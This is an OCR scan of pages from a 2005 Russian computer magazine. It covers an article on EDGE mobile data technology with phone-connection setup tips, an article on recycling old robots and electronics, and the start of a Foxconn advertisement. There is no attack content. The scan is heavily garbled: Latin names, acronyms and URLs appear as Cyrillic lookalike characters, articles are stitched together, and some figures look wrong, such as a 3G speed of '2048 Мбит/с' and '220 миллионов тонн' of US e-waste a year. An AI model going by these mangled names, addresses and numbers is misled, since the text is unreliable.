шшш.атоЫІе.ги/есІде — кратко о технологии ЕОѲЕ. 
\л/\л/\л/.пипііи5.сот/50Іиііоп524.1іітІ — технические 
характеристики технологии. 

\л/ш\л/.егіс550п.сотЛесІтоІоду/Іесй_агІісІе5/Е06Е.5ЫтІ — самое 
полное описание технологии в целом. 

ко использовать эту комбинацию практически невозможно. Ты ре- 
ально рискуешь посадить свои нервы. Виной тому невероятная тор- 
мознутость соединения. Форумы открываются по несколько минут, 
аська и ІРС глючат, ѴѴеЬтопеу-кипер иногда вообще отказывается 
коннектиться. Технология ЕЭ0Е совершенно точно избавит тебя от 
такого геморроя. Законопослушные граждане смогут без проблем 
серфить инет и получить значительно больший объем услуг, а опе- 
раторы сотовой связи — наконец-то увеличить емкость сети и воз- 
можность обслуживать больше абонентов при тех же ресурсах. 

[а когда?] На самом деле, уже! Впервые ЕЭ0Е была анонсирова- 
на Е5ТІ (Европейский институт стандартизации электросвязи) еще 
в начале 1997 года. В свою очередь, первая сеть на базе ЕЭ0Е бы- 
ла запущена в эксплуатацию во втором квартале 2003 года в 
США. Подсуетился известный оператор Сіпдиіаг ѴѴігеІезз, который 
использовал оборудование известной шведской конторы Егісззоп. 
Что касается реальных цифр, то оператор Сіпдиіаг ѴѴігеІезз пре- 
доставил пользователям отличные возможности: средняя ско- 
рость 100 Кбит/с с пиковыми значениями до 170 Кбит/с. 

Главной проблемой сетей ЕЭ0Е стал суровый дефицит абонентско- 
го оборудования. Долгое время на рынке был представлен весьма 
скудный выбор аппаратов, поддерживающих ЕЭ0Е. Выбирать, по 
сути, было не из чего. Справедливости ради стоит отметить, что сей- 
час его нет. Поддерживающие технологию ЕЭ0Е девайсы выпуска- 
ются всеми ведущими производителями, в том числе: НР, І_0, 
МоГогоІа, ІЧЕС, ІЧокіа, Рапазопіс, Затзипд, Зіетепз и Зопу Егісззоп. 






Сама технология ЕЭ0Е внедрена в более ста странах мира и под- 
держивается несколькими сотнями операторов, имеющих общую 
базу в 270 миллионов абонентов. К счастью, в России технология 
ЕЭ0Е тоже развивается, хотя и неравномерно. В этом процессе 
участвуют все отечественные гранды, включая «Мегафон», «Би- 
лайн» и «МТС». Первопроходцем в этом деле стал «Билайн», кото- 
рый первым сообщил о коммерческом запуске сети ЕЭ0Е в Воло- 
годской области. Не желая отставать, «Мобильные ТелеСистемы» 
внедрили ЕЭ0Е в Самарской и практически одновременно Мур- 
манской областях. Что касается Москвы, то тестовую эксплуата- 
цию технологии ЕЭ0Е в начале 2005 года запустил «Мегафон». 
Счастливые обладатели топовых моделей трубок уже успели по- 
тестить новую услугу и сейчас взахлеб делятся впечатлениями на 
различных форумах :). 

[взгляд изнутри] Изюминкой технологии ЕЭ0Е является простота ее 
внедрения. Со стороны операторов ее внедрение практически не 
требует замены оборудования, а следовательно, значимых вложе- 
ний и огромных затрат. Чуть позже ты увидишь, что технология во 
многом повторяет существующие сети 03М/0РР5. Именно поэто- 
му для ее внедрения достаточно будет произвести незначитель- 
ные изменения в сетевом оборудовании и программном обеспе- 
чении. Себестоимость этих изменений в общих масштабах сото- 
вой связи поистине ничтожная. Зато окупаемость — моментальная. 
Возникает логичный вопрос: за счет чего удается добиться увели- 
чения подобной скорости? Да еще и со столь скромными затра- 
тами? Для того, чтобы ответить на него, придется рассмотреть 
технологию ЕЭ0Е изнутри. 

Вообще говоря, технология ЕЭ0Е — это целый ряд технологий, в 
большинстве своем являющихся переработками уже существую- 
щих. Главные из них — усовершенствованные служба пакетной 
передачи (Е0РРЗ, ЕпГюпсесІ 0РРЗ) и расширение службы комму- 
тации каналов (ЕСЗЭ, ЕпГюпсесІ СігсиіГ 3\л/іГсГіесІ ЭаГа). Нас будет 



интересовать первая из них. 

Вообще говоря, ЕЭ0Е является своего рода надстройкой над имеющи- 
мися сетями 0РР5 и 05М. Самостоятельное функционирование этой 
технологии отдельно, скажем, от 0РРЗ невозможно по определению. 
Вспомни обычную телефонную линию: ты без проблем можешь исполь- 
зовать ее для передачи данных с помощью модема. Скорость закачки 
при этом будет ничтожно малой, хотя пропускная способность канала 
(телефонных проводов) на самом деле значительно выше. С установ- 
кой дома АЭ31_-модема и сплиттера, а на АТС — мультиплексора дос- 
тупа ЭЗІ. (05І7МѴІ), скорость может быть увеличена до 8 Мбит/с. При 
этом полностью отказаться от телефонной линии невозможно, так как 
она по-прежнему является каналом данных. Тоже самое происходит и 
с технологией ЕЭ0Е. Не появись она, мы бы до сих пор сидели на тор- 
мознутом 0РР5 и мечтали о высоких скоростях передачи данных. 

[откуда прирост скорости?] Одна из составляющих ЕЭ0Е — Е0РРЗ— 
изначально разрабатывалась для того, чтобы значительно увеличить 
пропускную способность сотовой сети. И сделано было для этого не- 
мало. Во многом это стало возможным за счет использования новых 
схем кодирования и модуляции, позволяющих намного более эффек- 
тивно использовать доступную полосу частот. 

Начнем с модуляции. Что вообще означает слово «модуляция»? 

Это процесс наложения транслируемого сигнала на несущую 
частоту. Грамотно выбрать модуляцию — очень важный этап в 
разработке любого приемо-передающего устройства. И тем бо- 
лее — технологии сотовой связи. 

В качестве базового метода модуляции ЕЭ0Е использует вось- л 
мипозиционную фазовую модуляцию (8-РЗК). Фаза сигнала о 
может принимать восемь различных значений, что позволяет в ^ 
одном символе кодировать уже 3 бита (см. скриншот). Я не бу- ^ 
ду рассказывать тебе о прочих технических особенностях ^ 
этого понятия, чтобы излишне не загружать тебя. Важно одно: ^ 

новый метод модуляции позволил увеличить скорость переда- ^1. 
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[СЕТЬ ТРЕТЬЕГО ПОКОЛЕНИЯ: МИФ ИЛИ РЕАЛЬНОСТЬ?] 

Для начала неплохо бы разобраться в том, что вообще предс- 
тавляет собой сеть третьего поколения. Исходя из официальной 
характеристики, утвержденной международным стандартом 
ІМТ-2000 (ІпІегпаііопаІ МоЬіІе Теіесоттипісаііопз 2000), под 
сетью 3-го поколения нужно понимать сеть, обеспечивающую 
скорость передачи данных от 144 Кбит/с до 2048 Мбит/с. Не 
нужно объяснять, что столь огромная пропускная способность 
позволит операторам предоставлять клиентам на порядок боль- 
ше услуг. По прогнозам многих аналитических компаний, доля 
голосового трафика будет значительно меньше, чем цифрового. 
Передача ЗМЗ/ММЗ сообщений, мелодий, различные сервисы 
обещают стать наиболее прибыльной отраслью в мобильном 
провайдинге. Тенденции наблюдаются уже сейчас. Именно поэ- 
тому реклама мобильных сервисов оккупировала эфирное вре- 
мя ведущих ТВ-каналов и страницы глянцевых журналов. Что 
тут таить — и нашего тоже. 

Высокие скорости не только смогут обеспечить комфортный 
серфинг, но и, например, возможность просмотра онлайново- 
го видео и радио. Да и вообще, соответствующие технологии 
уже есть, они введены в нескольких странах мира. Но почему 
они не так популярны, а в России о них только говорят? Поп- 
робуем разобраться. 

Ответ на самом деле крайне прост — нерентабельно. Для того 
чтобы предоставлять подобные услуги, операторам не только 
нужно полностью обновить оборудование, но и купить дорогосто- 
ящую лицензию. Кстати говоря, выдача подобных лицензий нач- 
нется только в конце текущего года, хотя Министерство связи го- 
тово выдать их прямо сейчас. Почему не берут? Дорого. 

Да и кому предоставлять подобные услуги? В Росси продают- 
ся единицы аппаратов, поддерживающие 30. Все они имеют 
цену от 500 долларов, что на фоне общего снижения цен ка- 
жется заоблачным. 

Особенно сильно сдерживает наших гигантов печальный опыт 
иностранных коллег. Вспомнить хотя бы японского оператора 
ІЧТТ ЬоСоМо (первопроходец в 30-сетях), который ввел в 
действие первую 30-сеть стандарта ѴѴСЭМА (ОМТЗ). Изначально 
предполагалось, что за 2 года число абонентов достигнет 2 мил- 
лионов человек. Набралось всего 300 тысяч... Та же ситуация 
складывается и в Западной Европе. 

Не нужно объяснять, что такие тенденции не способствуют быст- 
рому развитию сетей 3-го поколения. Уж слишком велик риск по- 
нести потери, огромные даже в масштабах сотовых операторов. 
Ждать в России сотовую связь 3-го поколения пока не приходит- 
ся. Возможно, она появится года через два. А может быть, и того 
позже. Сейчас же нам остается радоваться, что операторы нако- 
нец-то начали переход на перспективный ЕЭОЕ с морально уста- 
ревшего ОРВЗ. Пускай скорость в 100 Кбит/с еще слегка не до- 
тягивает до заветных 2 Мбит/с, которые в теории будут поддер- 
живать сети третьего поколения ІІМТЗ. Но даже такая скорость 
вполне достаточна, чтобы комфортно использовать все блага 
интернета прямо с терминала мобильного телефона. 



[ТЕЛЕФОНЫ С ПОДДЕРЖКОЙ ЕООЕ] 

Для использования технологии ЕЭѲЕ требуется подходящий де- 
вайс. Проштудировав характеристики современных телефонов, 
я подготовил для тебя список трубок, поддерживающих эту тех- 
нологию. 

ІЧокіа: 3200, 3220, 3230, 5140, 6010, 6170, 6220, 

6230, 6630, 6810, 6820, 6822, 7200, 7260, 7270, 

7280, 7710, 7700, 9300, 9500. 

Моіогоіа: М186, Е815, Т725е. 

ЗопуЕгісззоп: 2500, 0082, 0083, 0085. 

І_0: А7100. 

Заппзипд Р710, Р716. 

Зіегга ѴѴігеІезз Виддеб МР750, 

Зіегга ѴѴігеІезз АігСагб 755, 

Зіетепз МС-75. 

К слову, оборудованием не обделены и сами операторы. 

Все необходимые девайсы для базовых станций выпускают 
сразу Егісззоп, ІЧокіа, АІсаІеІ, Зіетепз и целый ряд других 
производителей. 
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[общая схема работы ЕйѲЕ] 
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[сравнение основных характеристик ѲРРЗ и ЕОѲЕ. Обрати 
внимание на Мобиіаііоп Ьіі гаіе (частота модуляции)] 

чи до 59,2 Кбит/с на один временной слот. 

На скиншоте я привел сравнение основных характе- 
ристик ѲРРЗ и ЕОѲЕ, взгляни на него. Несмотря на то, 
что ѲРРЗ и ЕЭѲЕ используют одну и ту же скорость 
передачи символов, но частота модуляции отлича- 
ется. Получается, что ЕОѲЕ в единицу времени спо- 
собен передавать в три раза больше битов, чем 
ѲРРЗ. Это позволяет значительно увеличить скорость 
передачи информации, но вместе с тем и доставля- 
ет некоторые неудобства. 

Для того чтобы это лучше осознать приведу следую- 
щий пример. Представь, что ты общаешься со своим 
хорошим другом и во всех подробностях рассказыва- 
ешь ему о девчонке, с которой намедни познакомился 
и отлично провел вечер. Если у тебя есть масса време- 
ни, то проблем возникнуть не должно. Но что будет, ес- 
ли все повествование нужно уложиться всего в 10 — 20 
секунд? Хочешь ли ты того или нет, но говорить придет- 
ся очень быстро, зачастую съедая окончания слов. 
Речь станет невнятной и сложной для понимания. А ес- 
ли беседа происходит на шумной улице, то понять те- 
бя будет и вовсе невозможно! 

Уплотнение двоичного потока (3 бита вместо одного, 
как в случае 8-РЗК) по той же самой причине может 
привести к ошибкам во время передачи, особенно в 
случае плохих эфирных условий. Для обеспечения 
целостности информации, ЕЭѲЕ использует допол- 
нительные контрольные биты. В некоторых же случа- 
ях уместно вообще применять менее эффективный, 
но более помехоустойчивый тип модуляции — ѲМ5К, 
оставшийся от ѲРРЗ. Используемый тип модуляции 




[каждая схема кодирования имеет жестко 
ограниченную максимальную скорость] 








[работа ЕООЕ для оператора мало 
чем отличается от обычного ОРВЗ] 

автоматически распознается, и оборудование пе- 
реходит в соответствующий режим. 
Усовершенствованный метод модуляции позволяет 
абонентскому устройству автоматически адаптиро- 
ваться к качеству канала радиосвязи. Поэтому самые 
высокие скорости передачи могут быть достигнуты в 
наиболее благоприятных условиях, например, непос- 
редственно вблизи базовой станции. 

Примечательно, что один временной слот системы 
ЕЭ0Е может быть использован несколькими пользова- 
телями одновременно. В отличие от 0РРЗ, где каждый 
тайм-слот зарезервирован только для одного пользо- 
вателя, ЕЭ0Е позволяет существенно снизить расходы 
радиоресурсов или при тех же мощностях увеличить 
их пропускную способность. Освобожденные ресур- 
сы могут быть отданы под дополнительные сервисы пе- 
редачи голоса и данных, что особенно важно для се- 
тей с ограниченными ресурсами. 

Использование нескольких временных слотов вкупе с 
системой 0РР5 позволяет достичь скорости до 473,6 
Кбит/с. Примечательно, что новая технология использует 
ту же самую структуру временных слотов, что и 03М. По- 
лучается, что операторы безболезненно могут исполь- 
зовать существующие радиоресурсы, но при этом пре- 
доставлять своим клиентами ряд услуг третьего поколе- 
ния. Вспомни телефонную линию: на модеме — 5 Кб/с, 
на А05І_ — до 8 Мбит/с. Чудеса, да и только! 

[кодирование информации] Для того чтобы передать 
информацию, ее нужно предварительно закодировать. 
Технология 0РР5 использует всего 4 схемы кодиро- 
вания — С51-С34. Выбор подходящей схемы осуще- 
ствляется исходя из частоты ошибок в эфире, воз- 
можности их коррекции. 

В технологию ЕЭ0Е заложены 9 новых схем кодиро- 
вания — М5С1-М5С9, которые условно можно раз- 
делить на две группы. Первые четыре (М5С1-МЗС4) 
используют стандартную для 0РРЗ модуляцию 
0М5К и дополняют каждый пакет наибольшим коли- 
чеством контрольных битов. Скорость передачи за- 
кодированной таким образом информации практи- 
чески не отличается от скорости в сети 0РРЗ. В слу- 
чае же пяти остальных схем (МЗС5-МЗС9) использу- 




ется более эффективная модуляция 8-РЗК, благодаря чему удается втрое 
увеличить скорость передачи данных. 

Одной из примечательных особенностей ЕЭ0Е являются шесть уровней 
кодирования (от РС5-1 до РС5-6) информации, имеющие различные ха- 
рактеристики помехоустойчивости. Известно, что условия приема для пе- 
ремещающегося абонента постоянно меняются. Один и тот же способ ко- 
дирования может быть прекрасно использован в одном случае, и быть со- 
вершенно неприемлемым в другом. К сожалению, технология 0РРЗ не учи- 
тывает этот факт. Получается, что дошедший с ошибками пакет, будут отп- 
равлен повторно, но по той же самой схеме кодирования, рискуя опять же 
нарваться на искажение данных. 

Адаптивный механизм ЕЭ0Е в свою очередь позволяет менять схему коди- 
рования искаженного пакета, тем самым, повышая надежность передачи 
данных. Это позволяет не только оперативно адаптироваться к их изменя- 
ющимся условиям, но и повысить пропускную способность сети там, где 
качество приема близко к идеальному (непосредственно вблизи базовой 
станции ОпСоСа) и дополнять пакет избыточными контрольными битами 
не требуется. Нельзя не отметить, что работа всей этой системы была бы 
невозможной без точного механизма оценки характеристик радиоканала 
(уровня сигнала, количества помех, ошибок). Смена режима кодирова- 
ния осуществляется каждый раз, когда декодируемый блок принимается 
с низкой достоверностью. В результате, следующий пакет передается с 
повышенной помехозащищенностью. 

[быстрое внедрение] Важно понять, что различия между 0РР5 и ЕЭ0Е прояв- 
ляются исключительно на уровне базовых станций — сама структура сети, 
большинство оборудования и протоколов остаются прежними. Если опера- 
тор успел полностью наладить и обкатать технологию 0РР8 в регионе, то 
обустройство ЕЭ0Е для него будет вполне решаемой задачей. Все измене- 
ния сводятся к установке так называемого трансивера, который воспринима- 
ет новые схемы модуляции, и нового программного обеспечения, адаптиро- 
ванного для работы с новыми протоколами на уровне радиоинтерфейса. 

В данный момент производится внедрение первой фазы стандарта ЕЭ0Е, 
предусматривающей увеличение пропускной 
способности сети, практически не затрагивая 
общее устройство сети и используемых стан- 
дартов. Но по прогнозам аналитиков вторая фа- 
за ЕЭ0Е уже тоже не за горами. Тогда-то мы и 
сможем насладиться большим количеством сер- 
висов, реализованных на базе ІР (онлайн телеви- 
дение, радио и т.д.). 

Несмотря на то, что слово ЕЭ0Е является аббревиа- 
турой от ЕпГіапсесІ Эоіа гаіезіюг 0ІоЬаІ Еѵоіиііоп, его 
можно перевести на русский язык как «край». По су- 
ти, технология является краем используемых ныне 
технологий мобильной связи и, в частности, 03М. С 
учетом ввода ЕЭ0Е, инженеры фактически выжима- 
ют из них последние соки. Дальше будут сотовые 
сети третьего поколения. И никак иначе © 




[Ыокіа 7200 

поддерживает технологию ЕООЕ. 
Максимальная скорость 
передачи данных — 177,6 КЬрз] 



[КАК НАСТРОИТЬ ЕООЕ-СОЕДИНЕНИЕ НА КОМПЬЮТЕРЕ?] 

Для того чтобы настроить ЕЭѲЕ особых усилий не требуется. Все 
настройки соединения в точности совпадают с настройками 
ѲРВЗ. Поэтому если у тебя был правильно настроен ОРВЗ, то 
должен заработать и ЕООЕ. Как только ты попадаешь в зону, где 
оператор поддерживает ЕООЕ (информация о таких зонах, как 
правило, доступна на сайте оператора), все данные будут переда- 
ваться именно по нему. Ты это сразу заметишь: скорость переда- 
чи данных поистине поражает! 

Кратко напомню основные моменты настройки соединения. 

Ш Первым делом, разумеется, нужно подключить телефон к 
компьютеру и установить все необходимые драйвера. Большин- 
ство современных телефонов с поддержкой ЕЭОЕ, как правило, 
комплектуются йАТА-кабелем. Хотя, конечно, никто не мешает 
тебе использовать другой тип соединения: ІРЮА-порт или 
ВІиеІооіИ. 

\ 2 \ Если ты все сделал правильно, то в списке устройств должен 
появиться новый модем. Очень важно зайти в его настройки и 
установить строку инициализации. Обычно она представляет со- 
бой ,І АТ+СООСОМТ=1, ІІ ІР ,І , ІІ іпІегпеі.ппс 11 . Но для достоверности ее 
стоит уточнить на сайте оператора. 

@ На этом все приготовления закончены. Тебе остается только 
создать обыкновенное модемное подключение, обозначив для 
него специальный телефон (*99***1#), а также логин и пароль, 
уточненные на сайте опсоса. 



[модуляция 8РЗК позволяет передавать 3 
бита в символе вместо одного] 



[хакер 07 [79] 05 > РС_20МЕ 035 ] 






ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕПРШМ 





Свалка роботов 

КОГДА Я ОСТОРОЖНО ПРИОТКРЫЛ ГЛАЗА, 
ЖЕЛТЫЙ РОБОТ ЗАМЕР НА САМОМ КРАЮ 
ПИРСА. МОЖЕТ БЫТЬ, ОН НА МГНОВЕНИЕ 
ВСПОМНИЛ «ФИРМЕННУЮ» ПОЛОСУ ПРЕ- 
ПЯТСТВИЙ ИЗ КУСКА НАЖДАЧКИ И ЛУЖИЦЫ 
ПОДСОЛНЕЧНОГО МАСЛА. НО, СКОРЕЕ ВСЕ- 
ГО, ПРОСТО КОНЧИЛСЯ ЗАВОД. Я НИКОГДА 
НЕ ПЕРЕТЯГИВАЛ ПРУЖИНУ — ЭТОМУ УЧИЛ 
МЕНЯ ДЕД, КОТОРЫЙ И ПРИНЕС МОЕГО 
ПЕРВОГО САМОДЕЛКИНА С ФАБРИКИ ИГРУ- 
ШЕК. КОГДА Я ВЕРНУЛСЯ НА ПИРС СО 
ВЗРОСЛЫМИ, РОБОТА УЖЕ НЕ БЫЛО. Я ПО- 
НЯЛ, ОН ОТПРАВИЛСЯ ТУДА, КУДА УХОДЯТ 

ВСЕ РОБОТЫ I Алекс Целых (еЦі1с>г@ТесІппе\л/5.ги) 

Утилизация хай-тека: 
жизнь после жизни 



[что день грядущий нам готовит?] Не соста- 
вит труда назвать места на Западе, где нуж- 
но искать отжившую свой век технику. Бру- 
клинский Музей искусства. Музей техниче- 
ских инноваций в Сан-Хосе, гаражные рас- 
продажи (дагаде $аІе$), барахолки и се- 
конд-хенды, специализированные свалки 
старой электроники и предприятия по ее 
утилизации. Сюда командируют авторов, пи- 
шущих для Но\л/$ТиШЛ/огк$ и "Популярной ме- 
ханики". Здесь стажируются летом начинаю- 
щие дизайнеры из Королевского колледжа 
искусств и МІТ Месііа І_аЬ, черпают идеи для 
фильмов создатели "Я, Робот", "Искусствен- 
ного разума" и "Роботов", проводят съемки 
популярных шоу. 



[музей роботов] Высокая честь быть предста- 
вленными в экспозиции музея роботов обыч- 
но выпадает редким "ископаемым" экзем- 
плярам, вечно молодым пионерам киберне- 
тики. Наверное, одна из самых впечатляю- 
щих действующих выставок роботов прошло- 
го, настоящего и будущего представлена в 
музее Массачусетского института техноло- 
ги й (ІіТТр://ѵѵеЬ. тіі. есІи/тизеипп/ехІііІэіТ- 

іопз/гоЬоТз.ІіТппІ ). Другая интересная пере- 
движная коллекция принадлежит Научному 
центру Карнеги. В свое время она выставля- 
лась в канадском Музее технических инно- 
ваций ( ѵѵѵѵѵѵ . //іе/ес/і. огд/ехЫЫТз/опІіпе/гоЬо- 
Тісз/). Персональных роботов давно собира- 
ет Роберт Дюэр ( ѵѵѵѵѵѵ.гоЬоіѵѵогкзІіор.соіп ), 
прототип доктора Руперта Бернса из "Двух- 





Онлай новые музеи роботов: 
ѵѵѵѵѵѵ. ІШесІі . огд/гоЬоіісз/ 
ѵѵѵѵѵѵ .гоЬоііап, сот/ гоЬоІ/ 
ѵѵѵѵѵѵ. Не-гоЬоітап. сот 
ѵѵѵѵѵѵ. гоЬоітизеит . сот 



сотлетнего человека". Наконец, 
музей игрушечных роботов с 
огромной коллекцией из 3000 эк- 
спонатов — от робота Роберта 
1950-го года выпуска до класси- 
ческого андробота Топо — на- 
ходится в Филадельфии, США. Заведует им некто Джозеф Кнедлхенс 
ф Іір ://боп е ІіеІсІ. сот/оірііо/ппізс/тизеипп .Іііт). В нашем Политехни- 
ческом музее, что на Новой площади в Москве, тоже есть своя кол- 
лекция роботов, представленная в числе прочих биокибернетиче- 
ской "Рукой Москвы", роботами, играющими в шашки, развлекатель- 
ными автоматами. С 1962 года проводником по залу Автоматики слу- 
жит робот-экскурсовод Сепулька, названный так в честь героя-ро- 
бота фантастического рассказа Станислава Лема. 

Однако главными героями сегодняшнего повествования станут не 
прославившиеся на весь мир роботы-эпохи, а их безымянные сопле- 
менники, чей жизненный путь, согласно техпаспорту, подошел к кон- 
цу, и встал выбор между свалкой и... жизнью после жизни. 



[мусорные войны] ѵіипкуагсі ѴѴагз 
— захватывающее дух телеви- 
зионное состязание, в котором 
две команды из трех человек со- 
ревнуются на время в строитель- 
стве рабочих агрегатов из под- 
ножного мусора. Мусорные вой- 
ны разворачиваются на свалке 
площадью 2 га в пригороде Лос- 
Анжелеса. Ведущие объявляют 
задание. Это может быть строи- 
тельство гоночного автомобиля, 
внедорожника, ветряной мельни- 
цы, катера на воздушной подуш- 
ке, миниатюрной субмарины или 







1-2 мая 2005 года в Мюнхе- 
не прошел четвертый еже- 
годный Фестиваль старой 
компьютерной техники. 
ЫІрУ/шші/. ѵіпіаде.огд/ 

Справочник по содержа- 
нию драгоценных металлов 
в оборудовании: 
Шр://аисШ-Ьу.пеі.ги 
/врбт.Мт 



Предприятия по переработ- 
ке старой электроники: 
ЫірУ/шѵѵ.ЬиІІіоп.ги 
/саіа!одие/і/?п=7 




глубоководного гидрокостюма с помпой. Команды имеют право по- 
совещаться с приглашенными экспертами, после чего начинают во- 
рочать горы сплющенных "ягуаров", стальных швеллеров, покрытого 
толстым слоем коррозии железа, проводов, оснований старых плат и 
разбитых блоков, кусков резины и самолетной обшивки. Если и этого 
мало, кран подтянет новую порцию мусора. В распоряжении сорев- 
нующихся команд — мощный сварочный агрегат для по- 
луавтоматической М10-сварки специальной проволокой, 
циркулярные пилы и другое серьезное оборудование. По 
ходу шоу вклиниваются ведущие, популярно разъясняя те- 
лезрителям, как работает тот или иной механизм. Через 10 
часов обе конструкции из хлама предстают на суд техни- 
ческих экспертов. На последнем этапе, после тщатель- 
ной проверки конструкций на безопасность, начинаются 
полевые краш-тесты. В зависимости от задания, это могут 
быть большие гонки, поражение мишени и другие испыта- 
ния. В ѵіипкуагсі ѴѴагз принимала участие и команда "мед- 
ведей из России". Положившись на русский авось, ребя- 
та приехали последними в гонке по пустыне. Они надолго 
застряли в горном ущелье, но на воде легко обставили 
американцев и англичан - на веслах. Кстати говоря, кубок 
победителя тоже изготовлен из отборного техноутиля. 



[девять жизней промышленного робота] А есть те, кто практикует ре- 
инкарнацию хай-тек мусора не столько из спортивного азарта, 
сколько по роду своей деятельности. Группа немецких художников 
РоЬоТІаЬ, американская компания РоЬоТѴѴогх и ряд других пред- 
приятий дают вторую жизнь списанным промышленным роботам. 
Несмотря на преклонный для техники возраст — 20 — 30 лет — эти ги- 



[интерактивная экспозиция роботов в Берлинском музее коммуникаций] 
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ганты еще способны жонглировать полуторацентнеровой чушкой на 
высоте 2 метра с точностью до 0,2 миллиметра. Манипуляторы 
АсІерТ, Кика, МоТоМап, ЫасГіі, ранее выполнявшие сварку и резку 
металла, конвейерную сборку, теперь при помощи программистов 
получают новую специальность. Они учатся танцевать, рисовать и 
играть на музыкальных инструментах, чтобы стать частью художе- 
ственных арт-инсталляций. Одни роботы сумели повторить движения 
живых танцовщиц. Другие показывают высший пилотаж, ударяя тес- 
аком между пальцев рук человека. Третьи обзавелись системой ма- 
шинного зрения и теперь рисуют дружеские шаржи с натуры. Еще 
одна пара манипуляторов стала заправскими диджеями, ловко 
играя виниловыми пластинками. Этим жестянкам здорово повезло 
— они не закончили свою яркую жизнь на свалке мусора или в пла- 
вильной печи и продолжают радовать человека. 

[золотая лихорадка] Но и на пенсию технику сегодня провожают бе- 
режно, с официальными почестями. Тон здесь задают предприятия по 
утилизации. Этих "охотников за душами роботов" пруд пруди. Тому есть 
объяснение. Учитывая тяжелый вес конструкций, выпущенных в про- 
шлом веке, они представляют собой источник лома черных металлов, 
стали и, конечно, цветных и драгоценных металлов. К последним отно- 
сятся золото, серебро, платина и металлы платиновой группы: палла- 
дий, иридий, родий, рутений, осмий. В нашей стране страсти по "золо- 
той лихорадке" подогреваются законами, по которым лом и отходы 
драгметаллов подлежат обязательному учету. Просто так списать нес- 
частную 286-ю "телегу" и выбросить ее на помойку нельзя. Нужно за- 
ключить договор со специализированной организацией и получить 
смешной акт о переработке 1 грамма золота, 2 — 5 граммов серебра, 
0,25 грамма платины и металлов платиновой группы. В современной 
технике драгметаллов еще меньше. Другое дело — "большие" ЭВМ, 
старые советские агрегаты и секретная военная техника. Позолочен- 
ные разъемы принимают по цене до 5 долларов за штуку, переключа- 
тели ПР-2 и резисторы ПТП-1 — по 15 долларов. Закупочная цена 1 кг 
конденсаторов КМ составляет до 1000 долларов. И это не предел. 
Однако выплавить "золотишко" в чугунке на газовой плите — дурная за- 
тея. Опыт китайских и индийских крестьян тому подтверждение. Китай- 



ская деревушка Гуандан буквально завалена электрон- 
ным мусором из Нового света. Крестьяне рубят мониторы 
топорами, не представляя, насколько опасны для здоро- 
вья старые катодные трубки. Они жгут пластиковые корпу- 
са, вдыхая пары свинца, ртути и кадмия. Вооружившись 
щетками, вычищают остатки токсичного тонера из картри- 
джей. Вымачивают компьютеры в лужах кислоты. В резуль- 
тате, земля буквально пропитана канцерогенами, а воду в 
ближайших водоемах нельзя пить. 

Извлечение драгоценных металлов из печатных плат и 
электронных компонентов должно происходить на 
специальном производстве по весьма сложной техно- 
логии. Детали сортируются по преобладанию в них 
количества тех или иных драгметаллов, дробятся и из- 
мельчаются, обжигаются и плавятся. При этом пласт- 
массовая основа подвергается разложению, а ме- 
таллические остатки драгметаллов восстанавливают- 
ся до оксидов, измельчаются, гранулируются и прохо- 
дят магнитную сепарацию. Полученный таким обра- 
зом порошок, разделенный по видам драгоценных 
металлов в виде гранул, расплавляется в индукцион- 
ных плавильных печах. После аффинажа — очистки 
извлеченных драгоценных металлов от примесей - из 
"намытого" добра могут быть изготовлены монеты, зо- 
лотые и серебряные слитки, отвечающие стандарту ѲоосІ Эеііѵе- 
гу. Знаменитые клейменые кирпичики весом с пудовую гирю — 
братский монумент тысячам загубленных механических душ, 
прекрасный, как золотая статуя Будды. 

[матрица, камо грядеши?] Только в США ежегодно производится 
220 миллионов тонн электронного хлама, и лишь 10% проходят ути- 
лизацию. Житель Европы выбрасывает, в среднем, 17 кг старой 
электроники в год, и эта цифра с каждым годом растет. Помойка 
хай-тека — страшная вещь. Ведь практически во всех полупровод- 
никовых устройствах присутствует кадмий, являющийся канцероге- 
ном. Свинец, токсичный для нервной системы, содержится в каж- 
дой печатной плате, в аккумуляторах и экранах мониторов. По ме- 
ре разложения защитных покрытий в окружающую среду выделя- 
ется диоксин. В ответ на растущую угрозу в мире повсеместно за- 
прещают кладбища электроники, законодательно закрепляют 
обязанность производителей закладывать утилизацию в цену това- 
ра. В Европе новые правила вступят в силу уже в декабре 2005 го- 
да. Другой документ обязывает с 2008 года прекратить использо- 
вание свинца, ртути, кадмия и других вредных материалов в техно- 
логическом процессе. Первые "зеленые" компьютеры, в которых 
содержание свинца снижено с 12 до 1 грамма, уже появились в 
магазинах. Стоимость услуги по утилизации старой электроники 
обычно не высока и составляет от 10 до 30 долларов. Компания 
присылает специальную коробку для упаковки техники, доставка 
которой к месту переработки оплачена заранее. В зависимости от 
меры износа, электронику жертвуют некоммерческим организа- 
циям, разбирают на запчасти, либо перерабатывают, при этом до 
90 процентов всех материалов направляются на повторное ис- 
пользование. Главное — помнить, что проблема существует. Шко- 
лы не смогут бесконечно принимать в дар устаревшую технику. 
Спрос на старое железо на аукционах постепенно сойдет на нет. 
Поэтому нужно мыслить по-новому. Нужно здорово изменить себя, 
чтобы развитая высокотехнологичная цивилизация не преврати- 
лась в гигантскую свалку хай-тека, мрачную и безжалостную кар- 
тину которой давно нарисовали певцы киберпанка © 




[короли мусорных баков — участники шоу ЗсгарИеар СИаІІепде, британской 
версии ^пкуагсі ѴѴагз] 



[СВАПКА.КОМ] 

Отвечая на вопрос в интернете, как вы избавляетесь от 
электронного хлама, более половины называют 
аукцион еВау. Этот сайт, действительно, стал 
технологической свалкой международного масштаба. 
Каталог насчитывает до двух миллионов одновременно 
выставленных на продажу лотов, которые имеют 
прямое отношение к теме этой статьи — от 
выпотрошенной робособаки АіЬо до боевого 
истребителя-перехватчика "МиГ-21 ". Правду говорят: 
"Чтобы продать что-нибудь ненужное, нужно сначала 
купить что-нибудь ненужное". Согласно последней 
статистике, каждый пятый покупатель выставляет лот 
на повторную продажу в течение года. 









РОХСОПП 

Асіѵапсіпд ТИгоидИ Іппоѵаііоп 



Наследие тысячелетий 

в технологиях будущего. 



Рохсопп - торговая 
марка Ноп Наі Ргесізіоп 
Іпсіизіту Со., Ш - мирового лиде- 
ра в области высокотехнологичных 
решений. Рохсопп — крупнейшая частная 
тайваньская компания, №1 в мире по ОЕМ- 
поставкам системных плат, разъемов и 
корпусов для ПК, №2 в мире по выпуску 
систем охлаждения. В 2004 году объем 
продаж компании превысил $16 млрд. 

Количество сотрудников, занятых на 
предприятиях Рохсопп 
по всем странам 
мира, более 
